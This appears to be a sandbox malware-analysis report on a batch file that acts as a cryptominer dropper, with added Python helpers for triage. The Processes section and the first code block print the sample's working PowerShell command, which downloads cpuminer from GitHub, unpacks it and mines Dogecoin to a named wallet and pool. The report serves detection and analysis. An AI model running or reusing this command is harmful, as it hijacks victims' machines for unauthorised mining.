Analysis
max time kernel: 1795s
max time network: 1806s
platform: windows10-1703_x64
resource: win10-20231215-ja
resource tags: arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system:windows
submitted: 2024-02-01, 23:55 UTC
Static task: static1
Behavioral task: behavioral1 (sample 73u3Ito.bat, resource win10-20231215-ja)
Behavioral task: behavioral2 (sample 73u3Ito.bat, resource win10v2004-20231215-ja)
General
Target: 73u3Ito.bat
Size: 499B
MD5: fe74bff27516829a88cfbc6f6e99646f
SHA1: 0c15d859211c79910b277d07e729bec7197a60cd
SHA256: b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512: a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 2: pid 2172 powershell.exe
  flow 4: pid 2172 powershell.exe
- Executes dropped EXE (1 IoC)
  pid 4620 cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  pid 4620 cpuminer-sse2.exe (5 DLL loads)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid 2172 powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 2172 powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 4936 wrote to memory of 2172 | 4936 | cmd.exe | 74
  PID 4936 wrote to memory of 2172 | 4936 | cmd.exe | 74
  PID 2172 wrote to memory of 3892 | 2172 | powershell.exe | 75
  PID 2172 wrote to memory of 3892 | 2172 | powershell.exe | 75
  PID 3892 wrote to memory of 4620 | 3892 | cmd.exe | 77
  PID 3892 wrote to memory of 4620 | 3892 | cmd.exe | 77
Processes
- C:\Windows\system32\cmd.exe (PID 4936)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2172)
    Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 3892)
      Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe (PID 4620)
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        Signatures: Executes dropped EXE; Loads dropped DLL
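The chain above is cmd.exe → powershell.exe → cmd.exe → cpuminer-sse2.exe, and everything an analyst needs (pool, port, wallet, algorithm, thread count) sits in the command lines. The following is an added example, not part of the tria.ge report or of cpuminer-opt: it rebuilds the parent/child chain from the "wrote to memory of" signature rows and extracts the miner configuration with regexes. The rows and command lines are copied from the report; the parser, the regexes and the field names it emits are this example's own assumptions.

```python
"""Added example, not part of the tria.ge report: rebuild the process chain from
the 'wrote to memory of' signature rows and pull the miner configuration out of
the command lines. Rows and command lines are copied from the report; the
parser, its regexes and the emitted field names are this example's own."""
from __future__ import annotations
import re
from urllib.parse import urlparse

# Process list as shown in the report: pid -> (image, command line).
PROCESSES = {
    4936: ("cmd.exe", r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"'),
    2172: ("powershell.exe", r'''powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"'''),
    3892: ("cmd.exe", r'"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'),
    4620: ("cpuminer-sse2.exe", "cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2"),
}

# The six 'Suspicious use of WriteProcessMemory' descriptions, verbatim from the report.
WPM_ROWS = """PID 4936 wrote to memory of 2172
PID 4936 wrote to memory of 2172
PID 2172 wrote to memory of 3892
PID 2172 wrote to memory of 3892
PID 3892 wrote to memory of 4620
PID 3892 wrote to memory of 4620"""

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)")
STRATUM_RE = re.compile(r"(stratum\+(?:tcp|ssl|tls)://[^\s'\"]+)")   # pool URL, stops at whitespace/quotes
USERPASS_RE = re.compile(r"--userpass[= ]([^\s'\"]+)")                # wallet:password
ALGO_RE = re.compile(r"(?:^|\s)-a\s+(\S+)")                            # '-a yespower' (not '-ArgumentList')
THREADS_RE = re.compile(r"(?:^|\s)-t\s+(\d+)")                         # '-t 2'

# Cmdlets that, together in one PowerShell command, form a download-unpack-run chain.
DOWNLOAD_RUN_CMDLETS = ("Invoke-WebRequest", "Expand-Archive", "Start-Process")


def parent_map(rows: str) -> dict[int, int]:
    """child pid -> parent pid; duplicate rows collapse into one edge."""
    return {int(child): int(parent) for parent, child in WPM_RE.findall(rows)}


def lineage(pid: int, parents: dict[int, int]) -> list[int]:
    """Root-first chain of pids ending at `pid`."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return chain[::-1]


def miner_config(cmdline: str) -> dict | None:
    """Pool/wallet/algo/threads if the command line carries a stratum URL, else None."""
    m = STRATUM_RE.search(cmdline)
    if not m:
        return None
    pool = urlparse(m.group(1))          # urlparse splits host:port for any scheme followed by '//'
    up = USERPASS_RE.search(cmdline)
    wallet, _, password = (up.group(1) if up else "").partition(":")
    algo = ALGO_RE.search(cmdline)
    threads = THREADS_RE.search(cmdline)
    return {
        "pool_host": pool.hostname,
        "pool_port": pool.port,
        "wallet": wallet,
        "password": password,
        "algo": algo.group(1) if algo else None,
        "threads": int(threads.group(1)) if threads else None,
    }


def is_download_and_run(cmdline: str) -> bool:
    """True when a PowerShell command line contains every cmdlet of the chain."""
    return "powershell" in cmdline.lower() and all(c in cmdline for c in DOWNLOAD_RUN_CMDLETS)


def triage(processes=PROCESSES, rows=WPM_ROWS) -> dict:
    """Per-pid lineage, miner configs and download-and-run pids for a report."""
    parents = parent_map(rows)
    findings = {"chains": {}, "miners": {}, "downloaders": []}
    for pid, (_image, cmd) in processes.items():
        findings["chains"][pid] = lineage(pid, parents)
        cfg = miner_config(cmd)
        if cfg:
            findings["miners"][pid] = cfg
        if is_download_and_run(cmd):
            findings["downloaders"].append(pid)
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

On a live host the same functions apply to Sysmon event 1 or Security event 4688 command lines; the WriteProcessMemory rows are simply the sandbox's stand-in for the ParentProcessId field those events carry.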
Network
-
Remote address: 8.8.8.8:53
Request: github.com IN A
Response: github.com IN A 140.82.121.4
-
GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip (powershell.exe)
Remote address: 140.82.121.4:443
Request: GET /JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
Host: github.com
Connection: Keep-Alive
Response: HTTP/1.1 302 Found
Date: Thu, 01 Feb 2024 23:57:33 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C28B:53831:1429D97E:1465039C:65BC2FEC
-
Remote address: 8.8.8.8:53
Request: objects.githubusercontent.com IN A
Response: objects.githubusercontent.com IN A 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133
-
GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream (powershell.exe)
Remote address: 185.199.108.133:443
Request: GET /github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
Host: objects.githubusercontent.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Length: 18353564
Content-Type: application/octet-stream
Content-MD5: o9vnhIGbDner0qCCrwwyiA==
Last-Modified: Thu, 30 Nov 2023 19:41:07 GMT
ETag: "0x8DBF1DC4BEC4077"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d190fa92-001e-0015-362f-4ff6e6000000
x-ms-version: 2020-10-02
x-ms-creation-time: Thu, 30 Nov 2023 19:41:07 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=cpuminer-opt-23.15-windows.zip
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 0
Date: Thu, 01 Feb 2024 23:57:33 GMT
X-Served-By: cache-iad-kcgs7200050-IAD, cache-lon4220-LON
X-Cache: HIT, MISS
X-Cache-Hits: 760, 0
X-Timer: S1706831853.493195,VS0,VE392
-
Remote address: 8.8.8.8:53
Request: 4.121.82.140.in-addr.arpa IN PTR
Response: 4.121.82.140.in-addr.arpa IN PTR lb-140-82-121-4-fra.github.com
-
Remote address: 8.8.8.8:53
Request: 133.108.199.185.in-addr.arpa IN PTR
Response: 133.108.199.185.in-addr.arpa IN PTR cdn-185-199-108-133.github.com
-
Remote address: 8.8.8.8:53
Request: 79.121.231.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: yespower.na.mine.zpool.ca IN A
Response: yespower.na.mine.zpool.ca IN A 198.50.168.213
-
Remote address: 8.8.8.8:53
Request: 213.168.50.198.in-addr.arpa IN PTR
Response: 213.168.50.198.in-addr.arpa IN PTR mine.zpool.ca
-
Remote address: 8.8.8.8:53
Request: 14.227.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 114.110.16.96.in-addr.arpa IN PTR
Response: 114.110.16.96.in-addr.arpa IN PTR a96-16-110-114.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 210.143.182.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 180.178.17.96.in-addr.arpa IN PTR
Response: 180.178.17.96.in-addr.arpa IN PTR a96-17-178-180.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 81.171.91.138.in-addr.arpa IN PTR
Response: (empty)
-
140.82.121.4:443 | https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip | tls, http | powershell.exe | sent 918 B, received 6.6 kB, packets 9 / 8
  HTTP Request: GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
  HTTP Response: 302
-
185.199.108.133:443 | https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream | tls, http | powershell.exe | sent 377.5 kB, received 18.9 MB, packets 7607 / 13594
  HTTP Request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
  HTTP Response: 200
-
(remote address and URL missing from the extracted report) | sent 56.3 kB, received 45.1 kB, packets 544 / 320
-
DNS github.com → 140.82.121.4 | sent 56 B, received 72 B, packets 1 / 1
-
DNS objects.githubusercontent.com → 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133 | sent 75 B, received 139 B, packets 1 / 1
-
DNS 4.121.82.140.in-addr.arpa (PTR) | sent 71 B, received 115 B, packets 1 / 1
-
DNS 133.108.199.185.in-addr.arpa (PTR) | sent 74 B, received 118 B, packets 1 / 1
-
DNS 79.121.231.20.in-addr.arpa (PTR) | sent 72 B, received 158 B, packets 1 / 1
-
DNS yespower.na.mine.zpool.ca → 198.50.168.213 | sent 71 B, received 87 B, packets 1 / 1
-
DNS 213.168.50.198.in-addr.arpa (PTR) | sent 73 B, received 100 B, packets 1 / 1
-
DNS 14.227.111.52.in-addr.arpa (PTR) | sent 72 B, received 158 B, packets 1 / 1
-
DNS 114.110.16.96.in-addr.arpa (PTR) | sent 72 B, received 137 B, packets 1 / 1
-
DNS 210.143.182.52.in-addr.arpa (PTR) | sent 73 B, received 147 B, packets 1 / 1
-
DNS 180.178.17.96.in-addr.arpa (PTR) | sent 72 B, received 137 B, packets 1 / 1
-
DNS 81.171.91.138.in-addr.arpa (PTR) | sent 72 B, received 146 B, packets 1 / 1
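Two details of the HTTP exchange above are worth extracting mechanically. The 302 from github.com points at a SigV4 presigned URL (X-Amz-Date plus X-Amz-Expires=300), so the objects.githubusercontent.com link in the report was only valid for five minutes and cannot be re-fetched from the report; the stable pivot is the unsigned github.com release URL. The 200 response carries a Content-MD5 header, which is the base64 of the raw 16-byte MD5 of the body, and the report's Downloads section lists no 18,353,564-byte file, so that header is the only hash of the archive available here. The following is an added example, not part of the tria.ge report: it decodes the Content-MD5 header, computes the presigned URL's validity window, and checks a timestamp against it. The header values and the Location URL are copied from the report; the helper functions and field names are this example's own.

```python
"""Added example, not part of the tria.ge report: derive verifiable facts from
the report's HTTP headers. Header values and the Location URL are copied from
the report; the functions and their field names are this example's own."""
from __future__ import annotations
import base64
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlparse

# Response headers of the 200 from objects.githubusercontent.com, copied from the report.
ASSET_RESPONSE_HEADERS = {
    "Content-Length": "18353564",
    "Content-MD5": "o9vnhIGbDner0qCCrwwyiA==",
    "Last-Modified": "Thu, 30 Nov 2023 19:41:07 GMT",
    "Content-Disposition": "attachment; filename=cpuminer-opt-23.15-windows.zip",
}

# Location header of the 302 from github.com, copied verbatim (split only for line length).
REDIRECT_LOCATION = (
    "https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/"
    "46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request"
    "&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300"
    "&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c"
    "&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118"
    "&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip"
    "&response-content-type=application%2Foctet-stream"
)


def content_md5_hex(header_value: str) -> str:
    """Content-MD5 (RFC 1864) is base64 of the raw 16-byte digest; return it as hex."""
    digest = base64.b64decode(header_value, validate=True)
    if len(digest) != 16:
        raise ValueError(f"Content-MD5 decoded to {len(digest)} bytes, expected 16")
    return digest.hex()


def presigned_window(url: str) -> tuple[datetime, datetime]:
    """(signed_at, expires_at) of a SigV4 presigned URL from X-Amz-Date and X-Amz-Expires."""
    q = parse_qs(urlparse(url).query)
    signed_at = datetime.strptime(q["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ").replace(tzinfo=timezone.utc)
    return signed_at, signed_at + timedelta(seconds=int(q["X-Amz-Expires"][0]))


def is_presigned_url_live(url: str, now_iso: str) -> bool:
    """True if an ISO 8601 timestamp (UTC assumed when no offset) falls inside the window."""
    now = datetime.fromisoformat(now_iso)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    signed_at, expires_at = presigned_window(url)
    return signed_at <= now < expires_at


def asset_facts(headers=ASSET_RESPONSE_HEADERS, location=REDIRECT_LOCATION) -> dict:
    """Filename, size, MD5 and signing window of the downloaded release asset."""
    signed_at, expires_at = presigned_window(location)
    return {
        "filename": headers["Content-Disposition"].split("filename=", 1)[1],
        "size": int(headers["Content-Length"]),
        "md5": content_md5_hex(headers["Content-MD5"]),
        "signed_at": signed_at.isoformat(),
        "expires_at": expires_at.isoformat(),
    }


if __name__ == "__main__":
    for k, v in asset_facts().items():
        print(f"{k}: {v}")
```

The decoded MD5 is what to compare against a fresh download of the same release asset from the unsigned github.com URL; a mismatch would mean the asset was replaced after the sandbox run.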
Downloads
-
Filesize: 1B (the single ASCII character "1"; the hashes below are those of that one byte)
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize: 1.2MB
MD5: 660d14eb3c292b36dcd9bf058e2c0430
SHA1: b552e1fe31d53cc1b030f2d8dd28da187166a2b4
SHA256: a3930e2a51876082e01ae4b03a5c7195cc94c1e23f3d70778b10565433ef4396
SHA512: 75b03a830fc39e9fa0ec43ecab8bd49b0b1eefbc27ed612ae3f12a6cecc45e1e2ce3d1c581a0b0fe5c7b466865d8d40775884957ff0dc7970f6c1afda02421f8
-
Filesize: 1005KB
MD5: 57167ffdbf18357fa913a9f52f0ff4f8
SHA1: 72f80689f5eafe73fe2054f52ab1592b0a8902bd
SHA256: 01ea7111be5775ddf2d4d6c62393168e25fe389beba4adb0c8d285ac71360cf8
SHA512: daa2d4f6ea6cb98ff5152fda754862b4d927e883f046aec2ec46a67da9e06d91a5b7920d9caf18ac81971d3dfc925ecea1ef18ec9e7abae2b0a665356e97cdf6
-
Filesize: 836KB
MD5: aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA1: 5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256: 218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512: c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize: 668KB
MD5: 85c2616d428b52f8c6ea1c95e7616f74
SHA1: 09b10c96c22766b030aad0c09d375887cff73baa
SHA256: fdde7602f3db8aed301e636e92076732c18b60c0efcaa95214215fb5821e4606
SHA512: e39c0cabe7c06072256fb496cead20dde3e423a2d542cba7d1c985e32dfcd32af33b2a8f0283721f89712c7020242d478226dd564adb4207664e8745ac5c5f8a
-
Filesize: 644KB
MD5: 0dc0d5332fb653828ee94648fa2b8073
SHA1: 8bbac56ea7390f908961615748bf131f037c02dc
SHA256: b53852bc869bd2583854a2a133625891e39056988bd6c356e069b117b52bd88d
SHA512: 72a4182b9235f6dcb2536f77a80d46ebb207f4fc0b50bb5dbf92e21f0f25fc5de80302cb6d40033619e308039b9b1d9813ff38b5acbdac94f9b54be255a90c8d
-
Filesize: 692KB
MD5: d1b635c9bca7eb2527ac7f8e05edb394
SHA1: 78556805f7754e216c9bee6fa8cf1b479b218427
SHA256: ef71e3bb7e68c024ce9ba692a0e8259a62f7bb237fec0817ca5186133741aa27
SHA512: fda726dd8172dd55d92105840416227f18b5342054cd95e1e09744901b57bd68391fc28ce75c2f9647be6dab5097fd891127aec36565b63c2490c805d72fdf33
-
Filesize: 853KB
MD5: 3d8671aa1701e511d45ffec439206bb9
SHA1: 47453987837e114a08ac9fb042d56e0a6b8310c6
SHA256: a335fe3223730a0c5c2c1d8ef283269c285db5336614f31779e527cef822ba0b
SHA512: b96b1a5786ac522511576f2528276ea051bab1d7e6c2bbe6d1de5aaffd07c8a7b953746e1846ce4bb122a37a2258ef709c3b6f9961155d47605781b483ef14b2
-
Filesize: 600KB
MD5: e84745a3244c09e4e075828bf84ead2d
SHA1: fe66f8d90f5ad97c8b4d2c50c8c4cfb3c86dc1e9
SHA256: 701ff0a36ef0d28523af4a1293686e04e6d563326b2ba61a08fb759d3da7dbfb
SHA512: dfe4992afd6e9e332ea7bdbf507585981e07e17b6020e74c3482c2b28aca9142a086b7333803140c6f97008adfdf79de6dcf7aaa01bbfd006d83c8e296de1eb9
-
Filesize: 617KB
MD5: 8dddb2d69671e86d75d9775ac6459a20
SHA1: 1a7b07fb8d0f5d68f9ff9a7445aa8cf07ccfd171
SHA256: 5f2981393cb14174b4018a3a46cee8eb7944244dea55da80c272fe21c600a189
SHA512: 9c740984fd11ceb791db28a39fd43d11a15cd551ee4495ecfe70fb49e8ce9dc2478d7d7144eb114c8c41bbcb5667b929fbeff5710f1a91c1ad89f0c2daae671a
-
Filesize: 606KB
MD5: 585efec1bc1d4d916a4402c9875dff75
SHA1: d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA256: 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512: b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770